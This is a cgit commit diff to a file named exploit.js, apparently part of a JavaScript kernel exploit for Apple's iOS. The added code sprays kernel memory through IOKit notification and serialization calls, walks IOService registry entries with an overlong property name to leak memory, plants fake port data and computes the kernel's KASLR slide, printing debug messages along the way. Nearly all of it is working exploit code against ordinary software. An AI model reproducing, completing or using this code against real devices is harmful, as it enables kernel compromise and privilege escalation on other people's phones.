summaryrefslogtreecommitdiff
path: root/src/js/kexp/exploit.js
diff options
context:
space:
mode:
Diffstat (limited to 'src/js/kexp/exploit.js')
-rw-r--r--src/js/kexp/exploit.js28
1 files changed, 27 insertions, 1 deletions
diff --git a/src/js/kexp/exploit.js b/src/js/kexp/exploit.js
index a78bdca..5296e6e 100644
--- a/src/js/kexp/exploit.js
+++ b/src/js/kexp/exploit.js
@@ -20,6 +20,8 @@ var KERN_SUCCESS = 0;
var NULL = 0;
var MACH_PORT_NULL = 0;
+var fakeportData = 0;
+
var kOSSerializeDictionary = 0x01000000;
var kOSSerializeArray = 0x02000000;
var kOSSerializeSet = 0x03000000;
@@ -73,6 +75,7 @@ function spray_data(mem, size, num, portptr) {
printf("%x %x\n", master, read_u32(master));
printf("%x\n", read_u32(0x36ebf00c + get_dyld_shc_slide()));
ret = io_service_add_notification_ool(read_u32(master), "IOServiceTerminate", dict, __cnt * 4, MACH_PORT_NULL, NULL, 0, err, portptr);
+ printf("still alive?\n");
if (ret == KERN_SUCCESS) {
ret = read_u32(err);
}
@@ -86,10 +89,11 @@ function copyinPort(kport, cnt) {
var self = mach_task_self();
var service = MACH_PORT_NULL;
var client = malloc(4);
- var it = MACH_PORT_NULL;
+ var it = malloc(4);
var o = MACH_PORT_NULL;
var data = malloc(4);
var master = malloc(4);
+ fakeportData = malloc(4);
host_get_io_master(mach_host_self(), master);
ret = spray_data(NULL, 0, 5, data);
printf("spray_data=%d (%s)\n", ret, mach_error_string(ret));
@@ -112,6 +116,28 @@ function copyinPort(kport, cnt) {
ret = read_u32(err);
}
printf("io_service_open_extended=%d (%s)\n", ret, mach_error_string(ret));
+ IORegistryEntryGetChildIterator(service, "IOService", it);
+
+ var found = false;
+
+ while ((o = IOIteratorNext(read_u32(it))) != MACH_PORT_NULL && !found) {
+ var buf = malloc(16 * 4);
+ var size = malloc(4);
+ write_u32(size, 16 * 4);
+ ret = IORegistryEntryGetProperty(o, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA", buf, size);
+ if (ret == KERN_SUCCESS) {
+ printf("yolo\n");
+// mach_port_deallocate(self, read_u32(data));
+// write_u32(data, MACH_PORT_NULL);
+ spray_data(tst, strlen(tst) + 1, 10, fakeportData);
+ var kslide = (((read_u32(buf + (9 << 2)) & 0xFFF00000) + 0x1000) -0x80001000) >>> 0;
+ printf("still alive? %x\n", 420);
+ printf("YOLO YOLO YOLO kaslr_slide=%s\n", kslide.toString(16));
+ sleep(1);
+ found = true;
+ }
+ }
+
}
function get_kernel_task() {
generated by cgit v1.2.3 (git 2.39.1) at 2025-11-30 22:40:14 +0000